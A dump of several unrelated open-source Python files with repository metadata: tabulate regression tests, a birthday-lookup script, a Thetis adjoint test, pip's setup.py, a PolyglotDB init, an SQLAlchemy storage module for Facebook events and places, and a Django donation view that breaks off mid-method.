def mk_headers():
for h in ["a", "b", "c"]:
yield h
formatted = tabulate(mk_iter_of_iters(), headers=mk_headers())
expected = "\n".join(
[
" a b c",
"--- --- ---",
" 0 1 2",
" 0 1 2",
" 0 1 2",
]
)
print("expected: %r\n\ngot: %r\n" % (expected, formatted))
assert_equal(expected, formatted)
def test_datetime_values():
"Regression: datetime, date, and time values in cells (issue #10)."
import datetime
dt = datetime.datetime(1991, 2, 19, 17, 35, 26)
d = datetime.date(1991, 2, 19)
t = datetime.time(17, 35, 26)
formatted = tabulate([[dt, d, t]])
expected = "\n".join(
[
"------------------- ---------- --------",
"1991-02-19 17:35:26 1991-02-19 17:35:26",
"------------------- ---------- --------",
]
)
print("expected: %r\n\ngot: %r\n" % (expected, formatted))
assert_equal(expected, formatted)
def test_simple_separated_format():
"Regression: simple_separated_format() accepts any separator (issue #12)"
from tabulate import simple_separated_format
fmt = simple_separated_format("!")
expected = "spam!eggs"
formatted = tabulate([["spam", "eggs"]], tablefmt=fmt)
print("expected: %r\n\ngot: %r\n" % (expected, formatted))
assert_equal(expected, formatted)
def py3test_require_py3():
"Regression: py33 tests should actually use Python 3 (issue #13)"
from platform import python_version_tuple
print("Expected Python version: 3.x.x")
print("Python version used for tests: %s.%s.%s" % python_version_tuple())
assert_equal(python_version_tuple()[0], "3")
def test_simple_separated_format_with_headers():
"Regression: simple_separated_format() on tables with headers (issue #15)"
from tabulate import simple_separated_format
expected = " a| b\n 1| 2"
formatted = tabulate(
[[1, 2]], headers=["a", "b"], tablefmt=simple_separated_format("|")
)
assert_equal(expected, formatted)
def test_column_type_of_bytestring_columns():
"Regression: column type for columns of bytestrings (issue #16)"
from tabulate import _column_type, _binary_type
result = _column_type([b"foo", b"bar"])
expected = _binary_type
assert_equal(result, expected)
def test_numeric_column_headers():
"Regression: numbers as column headers (issue #22)"
result = tabulate([[1], [2]], [42])
expected = " 42\n----\n 1\n 2"
assert_equal(result, expected)
lod = [dict((p, i) for p in range(5)) for i in range(5)]
result = tabulate(lod, "keys")
expected = "\n".join(
[
" 0 1 2 3 4",
"--- --- --- --- ---",
" 0 0 0 0 0",
" 1 1 1 1 1",
" 2 2 2 2 2",
" 3 3 3 3 3",
" 4 4 4 4 4",
]
)
assert_equal(result, expected)
def test_88_256_ANSI_color_codes():
"Regression: color codes for terminals with 88/256 colors (issue #26)"
colortable = [("\x1b[48;5;196mred\x1b[49m", "\x1b[38;5;196mred\x1b[39m")]
colorlessheaders = ("background", "foreground")
formatted = tabulate(colortable, colorlessheaders, "pipe")
expected = "\n".join(
[
"| background | foreground |",
"|:-------------|:-------------|",
"| \x1b[48;5;196mred\x1b[49m | \x1b[38;5;196mred\x1b[39m |",
]
)
print("expected: %r\n\ngot: %r\n" % (expected, formatted))
assert_equal(expected, formatted)
def test_column_with_mixed_value_types():
"Regression: mixed value types in the same column (issue #31)"
expected = "\n".join(["-----", "", "a", "я", "0", "False", "-----"])
data = [[None], ["a"], ["\u044f"], [0], [False]]
table = tabulate(data)
assert_equal(table, expected)
def test_latex_escape_special_chars():
"Regression: escape special characters in LaTeX output (issue #32)"
expected = "\n".join(
[
r"\begin{tabular}{l}",
r"\hline",
r" foo\^{}bar \\",
r"\hline",
r" \&\%\^{}\_\$\#\{\}\ensuremath{<}\ensuremath{>}\textasciitilde{} \\",
r"\hline",
r"\end{tabular}",
]
)
result = tabulate([["&%^_$#{}<>~"]], ["foo^bar"], tablefmt="latex")
assert_equal(result, expected)
def test_isconvertible_on_set_values():
"Regression: don't fail with TypeError on set values (issue #35)"
expected_py2 = "\n".join(["a b", "--- -------", "Foo set([])"])
expected_py3 = "\n".join(["a b", "--- -----", "Foo set()"])
result = tabulate([["Foo", set()]], headers=["a", "b"])
assert_in(result, [expected_py2, expected_py3])
def test_ansi_color_for_decimal_numbers():
"Regression: ANSI colors for decimal numbers (issue #36)"
table = [["Magenta", "\033[95m" + "1.1" + "\033[0m"]]
expected = "\n".join(
["------- ---", "Magenta \x1b[95m1.1\x1b[0m", "------- ---"]
)
result = tabulate(table)
assert_equal(result, expected)
def test_alignment_of_decimal_numbers_with_ansi_color():
"Regression: alignment for decimal numbers with ANSI color (issue #42)"
v1 = "\033[95m" + "12.34" + "\033[0m"
v2 = "\033[95m" + "1.23456" + "\033[0m"
table = [[v1], [v2]]
expected = "\n".join(["\x1b[95m12.34\x1b[0m", " \x1b[95m1.23456\x1b[0m"])
result = tabulate(table, tablefmt="plain")
assert_equal(result, expected)
def test_alignment_of_decimal_numbers_with_commas():
"Regression: alignment for decimal numbers with comma separators"
skip("test is temporarily disable until the feature is reimplemented")
# table = [["c1r1", "14502.05"], ["c1r2", 105]]
# result = tabulate(table, tablefmt="grid", floatfmt=',.2f')
# expected = "\n".join(
# ['+------+-----------+', '| c1r1 | 14,502.05 |',
# '+------+-----------+', '| c1r2 | 105.00 |',
# '+------+-----------+']
# )
# assert_equal(result, expected)
def test_long_integers():
"Regression: long integers should be printed as integers (issue #48)"
table = [[18446744073709551614]]
result = tabulate(table, tablefmt="plain")
expected = "18446744073709551614"
assert_equal(result, expected)
def test_colorclass_colors():
"Regression: ANSI colors in a unicode/str subclass (issue #49)"
try:
import colorclass
s = colorclass.Color("{magenta}3.14{/magenta}")
result = tabulate([[s]], tablefmt="plain")
expected = "\x1b[35m3.14\x1b[39m"
assert_equal(result, expected)
except ImportError:
class textclass(_text_type):
pass
s = textclass("\x1b[35m3.14\x1b[39m")
result = tabulate([[s]], tablefmt="plain")
expected = "\x1b[35m3.14\x1b[39m"
assert_equal(result, expected)
def test_mix_normal_and_wide_characters():
"Regression: wide characters in a grid format (issue #51)"
try:
import wcwidth # noqa
ru_text = "\u043f\u0440\u0438\u0432\u0435\u0442"
cn_text = "\u4f60\u597d"
result = tabulate([[ru_text], [cn_text]], tablefmt="grid")
expected = "\n".join(
[
"+--------+",
"| \u043f\u0440\u0438\u0432\u0435\u0442 |",
"+--------+",
"| \u4f60\u597d |",
"+--------+",
]
)
assert_equal(result, expected)
except ImportError:
skip("test_mix_normal_and_wide_characters is skipped (requires wcwidth lib)")
def test_multiline_with_wide_characters():
"Regression: multiline tables with varying number of wide characters (github issue #28)"
try:
import wcwidth # noqa
table = [["가나\n가ab", "가나", "가나"]]
result = tabulate(table, tablefmt="fancy_grid")
expected = "\n".join(
[
"╒══════╤══════╤══════╕",
"│ 가나 │ 가나 │ 가나 │",
"│ 가ab │ │ │",
"╘══════╧══════╧══════╛",
]
)
assert_equal(result, expected)
except ImportError:
skip("test_multiline_with_wide_characters is skipped (requires wcwidth lib)")
def test_align_long_integers():
"Regression: long integers should be aligned as integers (issue #61)"
table = [[_long_type(1)], [_long_type(234)]]
result = tabulate(table, tablefmt="plain")
expected = "\n".join([" 1", "234"])
assert_equal(result, expected)
def test_numpy_array_as_headers():
"Regression: NumPy array used as headers (issue #62)"
try:
import numpy as np
headers = np.array(["foo", "bar"])
result = tabulate([], headers, tablefmt="plain")
expected = "foo bar"
assert_equal(result, expected)
except ImportError:
raise skip("")
def test_boolean_columns():
"Regression: recognize boolean columns (issue #64)"
xortable = [[False, True], [True, False]]
expected = "\n".join(["False True", "True False"])
result = tabulate(xortable, tablefmt="plain")
assert_equal(result, expected)
def test_ansi_color_bold_and_fgcolor():
"Regression: set ANSI color and bold face together (issue #65)"
table = [["1", "2", "3"], ["4", "\x1b[1;31m5\x1b[1;m", "6"], ["7", "8", "9"]]
result = tabulate(table, tablefmt="grid")
expected = "\n".join(
[
"+---+---+---+",
"| 1 | 2 | 3 |",
"+---+---+---+",
"| 4 | \x1b[1;31m5\x1b[1;m | 6 |",
"+---+---+---+",
"| 7 | 8 | 9 |",
"+---+---+---+",
]
)
assert_equal(result, expected)
def test_empty_table_with_keys_as_header():
"Regression: headers='keys' on an empty table (issue #81)"
result = tabulate([], headers="keys")
expected = ""
assert_equal(result, expected)
def test_escape_empty_cell_in_first_column_in_rst():
"Regression: escape empty cells of the first column in RST format (issue #82)"
table = [["foo", 1], ["", 2], ["bar", 3]]
headers = ["", "val"]
expected = "\n".join(
[
"==== =====",
".. val",
"==== =====",
"foo 1",
".. 2",
"bar 3",
"==== =====",
]
)
result = tabulate(table, headers, tablefmt="rst")
assert_equal(result, expected)
def test_ragged_rows():
"Regression: allow rows with different number of columns (issue #85)"
table = [[1, 2, 3], [1, 2], [1, 2, 3, 4]]
expected = "\n".join(["- - - -", "1 2 3", "1 2", "1 2 3 4", "- - - -"])
result = tabulate(table)
assert_equal(result, expected)
def test_empty_pipe_table_with_columns():
"Regression: allow empty pipe tables with columns, like empty dataframes (github issue #15)"
table = []
headers = ["Col1", "Col2"]
expected = "\n".join(["| Col1 | Col2 |", "|--------|--------|"])
result = tabulate(table, headers, tablefmt="pipe")
assert_equal(result, expected)
def test_custom_tablefmt():
"Regression: allow custom TableFormat that specifies with_header_hide (github issue #20)"
tablefmt = TableFormat(
lineabove=Line("", "-", " ", ""),
linebelowheader=Line("", "-", " ", ""),
linebetweenrows=None,
linebelow=Line("", "-", " ", ""),
headerrow=DataRow("", " ", ""),
datarow=DataRow("", " ", ""),
padding=0,
with_header_hide=["lineabove", "linebelow"],
)
rows = [["foo", "bar"], ["baz", "qux"]]
expected = "\n".join(["A B", "--- ---", "foo bar", "baz qux"])
result = tabulate(rows, headers=["A", "B"], tablefmt=tablefmt)
assert_equal(result, expected)
def test_string_with_comma_between_digits_without_floatfmt_grouping_option():
"Regression: accept commas in numbers-as-text when grouping is not defined (github issue #110)"
table = [["126,000"]]
expected = "126,000"
result = tabulate(table, tablefmt="plain")
assert_equal(result, expected) # no exception
|
astanin/python-tabulate
|
test/test_regression.py
|
Python
|
mit
| 16,317
|
import json
with open("birthdays.json", "r") as damnJson:
birthDays = json.load(damnJson)
print("We know the birth days of: ")
for i in birthDays:
print(i)
print("\nWould you like to add or retrieve a birth day?")
lol = input().strip().lower()
if lol == "add":
person = input("Who's the lucky one? ")
date = input("What's his birth day? ")
birthDays[person] = date
with open("birthdays.json", "w") as damnJson:
json.dump(birthDays, damnJson)
print("\nk thx\n")
elif lol == "retrieve":
print("\nWho would you like to know the birth date of? ")
person = input()
    print(birthDays.get(person, "We don't know that person's birth day."))
else:
print("fk u m8")
|
daniLOLZ/variaRoba
|
Python/34.py
|
Python
|
mit
| 633
|
"""
Tests whether we can compute a consistent gradient of some functional
based on the forward model with respect to the bottom friction
via firedrake_adjoint.
Stephan Kramer 25-05-16
"""
import pytest
from thetis import *
from firedrake_adjoint import *
op2.init(log_level=INFO)
velocity_u = 2.0
def basic_setup():
lx = 100.0
ly = 50.0
nx = 20
ny = 10
mesh2d = RectangleMesh(nx, ny, lx, ly)
# export interval in seconds
t_export = 0.5
timestep = 0.5
# bathymetry
P1_2d = get_functionspace(mesh2d, 'CG', 1)
bathymetry_2d = Function(P1_2d, name='Bathymetry')
depth = 50.0
bathymetry_2d.assign(depth)
# --- create solver ---
solver_obj = solver2d.FlowSolver2d(mesh2d, bathymetry_2d)
options = solver_obj.options
options.simulation_export_time = t_export
options.check_volume_conservation_2d = True
options.fields_to_export = ['uv_2d', 'elev_2d']
options.timestepper_type = 'CrankNicolson'
options.timestep = timestep
options.horizontal_viscosity = Constant(2.0)
# create function spaces
solver_obj.create_function_spaces()
# create drag function and set it with a bump function representing a turbine
drag_func = Function(solver_obj.function_spaces.P1_2d, name='bottomdrag')
x = SpatialCoordinate(mesh2d)
drag_center = 12.0
drag_bg = 0.0025
x0 = lx/2
y0 = ly/2
sigma = 20.0
drag_func.project(drag_center*exp(-((x[0]-x0)**2 + (x[1]-y0)**2)/sigma**2) + drag_bg)
    # assign friction field
options.quadratic_drag_coefficient = drag_func
# assign boundary conditions
inflow_tag = 1
outflow_tag = 2
inflow_bc = {'un': Constant(-velocity_u)} # NOTE negative into domain
outflow_bc = {'elev': Constant(0.0)}
solver_obj.bnd_functions['shallow_water'] = {inflow_tag: inflow_bc,
outflow_tag: outflow_bc}
return solver_obj
def setup_steady():
solver_obj = basic_setup()
solver_obj.options.timestepper_type = 'SteadyState'
solver_obj.options.simulation_end_time = 0.499
solver_obj.options.timestepper_options.solver_parameters = {
'mat_type': 'aij',
'ksp_type': 'preonly',
'pc_type': 'lu',
'pc_factor_mat_solver_type': 'mumps',
'snes_type': 'newtonls',
}
solver_obj.create_equations()
return solver_obj
def setup_unsteady():
solver_obj = basic_setup()
solver_obj.options.timestepper_type = 'CrankNicolson'
solver_obj.options.simulation_end_time = 2.0
solver_obj.options.timestepper_options.implicitness_theta = 1.0
solver_obj.options.timestepper_options.solver_parameters = {
'mat_type': 'aij',
'ksp_type': 'preonly',
'pc_type': 'lu',
'pc_factor_mat_solver_type': 'mumps',
'snes_type': 'newtonls',
}
solver_obj.create_equations()
return solver_obj
@pytest.fixture(params=[setup_steady, setup_unsteady])
def setup(request):
return request.param
def test_gradient_from_adjoint(setup):
solver_obj = setup()
solver_obj.assign_initial_conditions(uv=as_vector((velocity_u, 0.0)), elev=Constant(0.0))
solver_obj.iterate()
J0 = assemble(solver_obj.fields.solution_2d[0]*dx)
drag_func = Control(solver_obj.options.quadratic_drag_coefficient)
Jhat = ReducedFunctional(J0, drag_func)
c = Function(solver_obj.options.quadratic_drag_coefficient)
dc = Function(c)
from numpy.random import rand
c.vector()[:] = rand(*c.dat.shape)
dc.vector()[:] = rand(*dc.dat.shape)
minconv = taylor_test(Jhat, c, dc)
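    # a consistent gradient makes the Taylor remainder converge at second
    # order, so the measured convergence rate should be close to 2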
assert minconv > 1.90
|
tkarna/cofs
|
test_adjoint/test_swe_adjoint.py
|
Python
|
mit
| 3,627
|
import codecs
import os
import re
import sys
from setuptools import setup, find_packages
from setuptools.command.test import test as TestCommand
here = os.path.abspath(os.path.dirname(__file__))
class PyTest(TestCommand):
def finalize_options(self):
TestCommand.finalize_options(self)
self.test_args = []
self.test_suite = True
def run_tests(self):
#import here, cause outside the eggs aren't loaded
import pytest
sys.exit(pytest.main(self.test_args))
def read(*parts):
# intentionally *not* adding an encoding option to open, See:
# https://github.com/pypa/virtualenv/issues/201#issuecomment-3145690
return codecs.open(os.path.join(here, *parts), 'r').read()
def find_version(*file_paths):
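    # read __version__ = '...' out of the file with a regex instead of
    # importing the package (importing could fail before installation)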
version_file = read(*file_paths)
version_match = re.search(r"^__version__ = ['\"]([^'\"]*)['\"]",
version_file, re.M)
if version_match:
return version_match.group(1)
raise RuntimeError("Unable to find version string.")
long_description = read('README.rst')
tests_require = ['pytest', 'virtualenv>=1.10', 'scripttest>=1.3', 'mock']
setup(
name="pip",
version=find_version("pip", "__init__.py"),
description="The PyPA recommended tool for installing Python packages.",
long_description=long_description,
classifiers=[
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Topic :: Software Development :: Build Tools",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.2",
"Programming Language :: Python :: 3.3",
"Programming Language :: Python :: 3.4",
"Programming Language :: Python :: Implementation :: PyPy"
],
keywords='easy_install distutils setuptools egg virtualenv',
author='The pip developers',
author_email='python-virtualenv@groups.google.com',
url='http://www.pip-installer.org',
license='MIT',
packages=find_packages(exclude=["contrib", "docs", "tests*", "tasks"]),
package_data={
'pip._vendor.requests': ['*.pem'],
'pip._vendor.distlib._backport': ['sysconfig.cfg'],
'pip._vendor.distlib': ['t32.exe', 't64.exe', 'w32.exe', 'w64.exe'],
},
entry_points={
"console_scripts": [
"pip=pip:main",
"pip%s=pip:main" % sys.version[:1],
"pip%s=pip:main" % sys.version[:3],
],
},
tests_require=tests_require,
zip_safe=False,
extras_require={
'testing': tests_require,
},
cmdclass={'test': PyTest},
)
|
Ivoz/pip
|
setup.py
|
Python
|
mit
| 2,816
|
from .context import CorpusContext
from .audio import AudioContext
from .importable import ImportContext
from .lexical import LexicalContext
from .pause import PauseContext
from .utterance import UtteranceContext
from .structured import StructuredContext
from .syllabic import SyllabicContext
from .spoken import SpokenContext
|
samihuc/PolyglotDB
|
polyglotdb/corpus/__init__.py
|
Python
|
mit
| 328
|
#!/usr/local/bin/python3
# STL imports
import datetime
import json
import logging
import pprint
# Package imports
import dateutil.parser
import sqlalchemy
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import (relationship, scoped_session, sessionmaker,
validates)
import fbd.tools
def default_json_serializer(obj):
'''
JSON serializer for storage objects not supported by the default package
'''
if isinstance(obj, datetime.datetime):
return obj.isoformat()
if (isinstance(obj, Topic) or isinstance(obj, Place) or
isinstance(obj, Event)):
return obj.to_dict()
raise TypeError('{} type could not be serialized.'.format(type(obj)))
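# Example (illustrative only):
#   json.dumps({'when': datetime.datetime.now()}, default=default_json_serializer)
# datetimes are serialized via isoformat(); Topic/Place/Event via to_dict()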
Base = declarative_base()
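# association table backing the many-to-many relationship between Place and Topic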
place_topic = sqlalchemy.Table(
'Place_Topic',
Base.metadata,
sqlalchemy.Column('place_id', sqlalchemy.String,
sqlalchemy.ForeignKey('Place.id')),
sqlalchemy.Column('topic_id', sqlalchemy.String,
sqlalchemy.ForeignKey('Topic.id')),
)
class Topic(Base):
__tablename__ = 'Topic'
@classmethod
def from_dict(cls, topic_dict):
return cls(id=topic_dict.get('id'), name=topic_dict.get('name'))
def to_json(self):
return json.dumps(
self.to_dict(),
default=default_json_serializer,
separators=(',', ':'),
)
def to_dict(self):
return {'id': self.id, 'name': self.name}
id = sqlalchemy.Column(sqlalchemy.String(200), primary_key=True)
name = sqlalchemy.Column(sqlalchemy.String(100))
places = relationship('Place', secondary=place_topic)
@validates('name')
def validate_trunc(self, key, value):
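        # truncate values that exceed the column's declared max length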
max_len = getattr(self.__class__, key).prop.columns[0].type.length
if value and len(value) > max_len:
return value[:max_len]
return value
def __init__(self, id, name):
self.id = id
self.name = name
class Place(Base):
__tablename__ = 'Place'
@classmethod
def from_dict(cls, place_dict):
place_loc = place_dict.get('location', {})
topic_list = []
        if place_dict.get('place_topics'):
            topic_list = [Topic.from_dict(topic_dict)
                          for topic_dict
                          in place_dict['place_topics'].get('data')]
        return cls(id=place_dict['id'],
                   topics=topic_list,
                   ptype=place_dict.get('place_type', 'UNKNOWN'),
name=place_dict.get('name', 'Unnamed'),
city=place_loc.get('city', 'Wroclaw'),
country=place_loc.get('country', 'Poland'),
lat=place_loc.get('latitude', 0.0),
lon=place_loc.get('longitude', 0.0),
street=place_loc.get('street', 'Unknown'),
zip=place_loc.get('zip', '00-000'))
def to_json(self):
return json.dumps(
self.to_dict(),
default=default_json_serializer,
separators=(',', ':'),
)
def to_dict(self):
# IDEA: Add events=T/F flag?
# IDEA: Auto-generate fields?
return {
'id': self.id,
'name': self.name,
'ptype': self.ptype,
'topics': [topic.to_dict() for topic in self.topics],
'city': self.city,
'country': self.country,
'lat': self.lat,
'lon': self.lon,
'street': self.street,
'zip': self.zip,
}
id = sqlalchemy.Column(sqlalchemy.String(200), primary_key=True)
name = sqlalchemy.Column(sqlalchemy.String(100))
ptype = sqlalchemy.Column(sqlalchemy.String(10))
city = sqlalchemy.Column(sqlalchemy.String(25))
country = sqlalchemy.Column(sqlalchemy.String(25))
lat = sqlalchemy.Column(sqlalchemy.Float())
lon = sqlalchemy.Column(sqlalchemy.Float())
street = sqlalchemy.Column(sqlalchemy.String(100))
topics = relationship('Topic', secondary=place_topic, cascade='save-update')
zip = sqlalchemy.Column(sqlalchemy.String(6))
@validates('name', 'ptype', 'street', 'country', 'zip')
def validate_trunc(self, key, value):
max_len = getattr(self.__class__, key).prop.columns[0].type.length
if value and len(value) > max_len:
return value[:max_len]
return value
def __init__(self, id, name, topics, ptype, city, country, lat, lon, street,
zip):
self.id = id
self.name = name
self.ptype = ptype
self.topics = topics
self.city = city
self.country = country
self.lat = lat
self.lon = lon
self.street = street
self.zip = zip
def __repr__(self):
return '<Place {} - {}>'.format(self.id, self.name)
def __str__(self):
return '<Place {} - {}>'.format(self.id, self.name)
class Event(Base):
__tablename__ = 'Event'
@classmethod
def from_dict(cls, event_dict):
return cls(
id=event_dict['id'],
desc=event_dict.get('description', 'None'),
name=event_dict['name'],
picture_url=event_dict.get('picture', {})
.get('data', {}).get('url', 'None'),
ticket_url=event_dict.get('ticket_uri', 'None'),
            place_id=event_dict.get('place_id'),
start_time=dateutil.parser.parse(
event_dict.get(
'start_time',
'2017-04-07T16:00:00+0200',
)),
)
def to_json(self):
return json.dumps(
self.to_dict(),
default=default_json_serializer,
separators=(',', ':'),
)
def to_dict(self):
return {
'id': self.id,
'name': self.name,
'description': self.description,
'start_time': self.start_time,
'place_id': self.place_id,
'picture_url': self.picture_url,
'ticket_url': self.ticket_url,
}
id = sqlalchemy.Column(sqlalchemy.String(200), primary_key=True)
description = sqlalchemy.Column(sqlalchemy.String(10000))
name = sqlalchemy.Column(sqlalchemy.String(100))
picture_url = sqlalchemy.Column(sqlalchemy.String(150))
ticket_url = sqlalchemy.Column(sqlalchemy.String(150))
start_time = sqlalchemy.Column(sqlalchemy.DateTime)
place_id = sqlalchemy.Column(
sqlalchemy.String(50), sqlalchemy.ForeignKey('Place.id'))
place = relationship('Place', backref='events', foreign_keys=[place_id])
@validates('description', 'name')
def validate_trunc(self, key, value):
max_len = getattr(self.__class__, key).prop.columns[0].type.length
if value and len(value) > max_len:
return value[:max_len]
return value
@validates('picture_url', 'ticket_url')
def validate_strict(self, key, value):
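        # URLs that exceed the column length are replaced with the sentinel
        # 'None' rather than truncated, since a truncated URL is useless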
max_len = getattr(self.__class__, key).prop.columns[0].type.length
if value and len(value) > max_len:
return 'None'
return value
def __init__(self, id, desc, name, picture_url, ticket_url, start_time,
place_id):
self.id = id
self.name = name
self.description = desc
self.start_time = start_time
self.place_id = place_id
self.picture_url = picture_url
self.ticket_url = ticket_url
def __repr__(self):
return '<Event {} - {}>\n{}'.format(self.id, self.name,
pprint.pformat(self.to_dict()))
def __str__(self):
return pprint.pformat(self.to_dict())
# TODO: Implement 'Page' class
# TODO: Implement 'Post' class
# class Post(Base):
# __tablename__ = 'Post'
# id = sqlalchemy.Column(sqlalchemy.String(50), primary_key=True)
# message = sqlalchemy.Column(sqlalchemy.String(10000))
# link = sqlalchemy.Column(sqlalchemy.String(150))
# created_time = sqlalchemy.Column(sqlalchemy.DateTime)
#
# like = sqlalchemy.Column(sqlalchemy.Integer())
# love = sqlalchemy.Column(sqlalchemy.Integer())
# haha = sqlalchemy.Column(sqlalchemy.Integer())
# wow = sqlalchemy.Column(sqlalchemy.Integer())
# sad = sqlalchemy.Column(sqlalchemy.Integer())
# angry = sqlalchemy.Column(sqlalchemy.Integer())
# thankful = sqlalchemy.Column(sqlalchemy.Integer())
#
# page_id = sqlalchemy.Column(sqlalchemy.String(
# 50), sqlalchemy.ForeignKey('Page.id'))
# page = relationship('Page', backref='posts', foreign_keys=[page_id])
#
# @validates('message')
# def validate_trunc(self, key, value):
# max_len = getattr(self.__class__, key).prop.columns[0].type.length
# if value and len(value) > max_len:
# return value[:max_len]
# return value
#
# @validates('link')
# def validate_strict(self, key, value):
# max_len = getattr(self.__class__, key).prop.columns[0].type.length
# if value and len(value) > max_len:
# return 'None'
# return value
#
# def __init__(self, id, page_id, message, link, created_time, like, love, haha, wow, sad, angry, thankful):
# self.id = id
# self.message = message
# self.page_id = page_id
# self.link = link
# self.created_time = created_time
# self.like = like
# self.love = love
# self.haha = haha
# self.wow = wow
# self.sad = sad
# self.angry = angry
# self.thankful = thankful
#
# def __repr__(self):
# return '<Post {} - {}>'.format(self.id, self.message[:25])
#
# def __str__(self):
# return '<Post {} - {}>'.format(self.id, self.message[:25])
#
#
class Storage:
def __init__(self, db_url='sqlite:///db/fb.sqlite'):
self.db = sqlalchemy.create_engine(db_url)
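        # create any missing tables; failures (e.g. tables already present)
        # are logged and otherwise ignored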
try:
Base.metadata.create_all(self.db)
except Exception as e:
            logging.debug(e)
session = scoped_session(sessionmaker(bind=self.db))
self.session_factory = session
self.session = self.session_factory()
def __del__(self):
self.session_factory.remove()
def save_eventlist(self, eventlist, commit=True):
try:
eventlist = [Event.from_dict(event_dict)
for event_dict in eventlist]
self.session.bulk_save_objects(eventlist)
if commit:
self.session.commit()
except sqlalchemy.exc.IntegrityError as e:
logging.debug(f'Storage.save_eventlist: {e}')
self.session.rollback()
except Exception as e:
self.session.rollback()
logging.exception(f'Storage.save_eventlist: {e}')
def save_placelist(self, placelist, commit=True):
try:
placelist = [Place.from_dict(pdict)
for pdict in placelist]
self.session.bulk_save_objects(placelist)
if commit:
self.session.commit()
except sqlalchemy.exc.IntegrityError as e:
logging.debug(f'Storage.save_placelist: {e}')
self.session.rollback()
except Exception as e:
self.session.rollback()
logging.exception(f'Storage.save_placelist: {e}')
def save_topiclist(self, topiclist, commit=True):
try:
topiclist = [Topic.from_dict(topic_dict)
for topic_dict in topiclist]
self.session.bulk_save_objects(topiclist)
if commit:
self.session.commit()
except sqlalchemy.exc.IntegrityError as e:
logging.debug(f'Storage.save_topiclist: {e}')
self.session.rollback()
except Exception as e:
self.session.rollback()
logging.exception(f'Storage.save_topiclist: {e}')
def save_event(self, event_dict, commit=True):
try:
event = Event.from_dict(event_dict)
self.session.add(event)
if commit:
self.session.commit()
except sqlalchemy.exc.IntegrityError as e:
logging.debug(f'Storage.save_event: {e}')
self.session.rollback()
except Exception as e:
self.session.rollback()
logging.exception(f'Storage.save_event: {e}')
def save_topic(self, topic_dict, commit=True):
try:
if self.topic_exists(topic_dict.get('id')):
return self.get_topic(topic_dict.get('id'))
topic = Topic.from_dict(topic_dict)
self.session.add(topic)
if commit:
self.session.commit()
return topic
except sqlalchemy.exc.IntegrityError as e:
logging.debug(f'Storage.save_topic: {e}')
self.session.rollback()
except Exception as e:
self.session.rollback()
logging.exception(f'Storage.save_topic: {e}')
def save_place(self, place_dict, commit=True):
try:
place = Place.from_dict(place_dict)
self.session.add(place)
if commit:
self.session.commit()
except sqlalchemy.exc.IntegrityError as e:
logging.debug(f'Storage.save_place: {e}')
self.session.rollback()
except Exception as e:
self.session.rollback()
logging.exception(f'Storage.save_place: {e}')
def update_place(self, place, commit=True):
# TODO: update and use session.merge
logging.debug(f'Storage: update_place request, place = {place}')
try:
# IDEA: Move this to the place class and pass in a string list
if self.place_exists(place['id']):
place_loc = place.get('location', {})
topic_list = []
if place.get('place_topics', None):
for topic in place['place_topics'].get('data'):
topic_list.append(
Topic.from_dict({
'name': topic['name'],
'id': topic['id']
}))
old_place = self.get_place(place['id'])
old_place.topics = topic_list
old_place.ptype = place.get('place_type', 'UNKNOWN')
old_place.name = place['name']
old_place.city = place_loc.get('city')
old_place.country = place_loc.get('country')
old_place.lat = place_loc['latitude']
old_place.lon = place_loc['longitude']
old_place.street = place_loc.get('street')
old_place.zip = place_loc.get('zip')
if commit:
self.session.commit()
return old_place
else:
return self.save_place(place, commit)
except sqlalchemy.exc.IntegrityError as e:
logging.debug(f'Storage.update_place: {e}')
self.session.rollback()
except Exception as e:
self.session.rollback()
logging.exception(f'Storage.update_place: {e}')
def save_post(self):
pass
def save_page(self):
pass
def get_all_place_ids(self):
return [id[0] for id in self.session.query(Place.id).all()]
def get_all_event_ids(self):
return [id[0] for id in self.session.query(Event.id).all()]
def get_all_topic_ids(self):
return [id[0] for id in self.session.query(Topic.id).all()]
def get_place(self, place_id):
return self.session.query(Place).filter_by(id=place_id).scalar()
def get_topic(self, topic_id):
return self.session.query(Topic).filter_by(id=topic_id).scalar()
def topic_exists(self, topic_id):
        return self.session.query(Topic.id).filter_by(
            id=topic_id).scalar() is not None
def place_exists(self, place_id):
        return self.session.query(Place.id).filter_by(
            id=place_id).scalar() is not None
def get_event(self, event_id):
return self.session.query(Event).filter_by(id=event_id).scalar()
def event_exists(self, event_id):
        return self.session.query(Event.id).filter_by(
            id=event_id).scalar() is not None
    def get_events_coords(self, lat, lon, distance=2000, date=None):
        # resolve the default cutoff at call time; datetime.datetime.today()
        # as a default argument would be evaluated only once, at import
        if date is None:
            date = datetime.datetime.today()
dlat = fbd.tools.lat_from_met(distance)
dlon = fbd.tools.lon_from_met(distance)
        # approximate the requested radius with a lat/lon bounding box
left, right = lon - dlon, lon + dlon
bottom, top = lat - dlat, lat + dlat
places = (self.session.query(Place).filter(Place.lat >= bottom)
.filter(Place.lat <= top).filter(Place.lon >= left)
.filter(Place.lon <= right).all())
events = [
event.to_dict() for place in places for event in place.events
if event.start_time > date
]
return events
def get_places_coords(self, lat, lon, distance=2000):
dlat = fbd.tools.lat_from_met(distance)
dlon = fbd.tools.lon_from_met(distance)
        # approximate the requested radius with a lat/lon bounding box
left, right = lon - dlon, lon + dlon
bottom, top = lat - dlat, lat + dlat
places = (self.session.query(Place).filter(Place.lat >= bottom)
.filter(Place.lat <=
top).filter(Place.lon >=
left).filter(Place.lon <= right).all())
return places
if __name__ == '__main__':
s = Storage()
pprint.pprint(s.get_events_coords(51.1, 17.01))
|
olety/FBD
|
fbd/storage.py
|
Python
|
mit
| 19,799
|
from django.http import HttpResponse
from django.views.generic import TemplateView, DetailView
from django.views.generic.edit import FormView
from .forms import DonationForm
from .models import CardType
import json
class PagoView(FormView):
form_class = DonationForm
template_name = 'pago.html'
success_url = 'http://funsepa.org/cms/es/gracias/'
def get_context_data(self, **kwargs):
context = super(PagoView, self).get_context_data(**kwargs)
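        # optional ?david= / ?navidad= query parameters toggle
        # campaign-specific content in the template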
david = self.request.GET.get('david', None)
navidad = self.request.GET.get('navidad', None)
if david:
context['david'] = True
if navidad:
context['navidad'] = True
return context
    def form_valid(self, form):
        response = super(PagoView, self).form_valid(form)
        return response
class PagoDone(TemplateView):
template_name = 'done.html'
class CardTypeView(DetailView):
model = CardType
slug_field = 'card_type'
def get(self, *args, **kwargs):
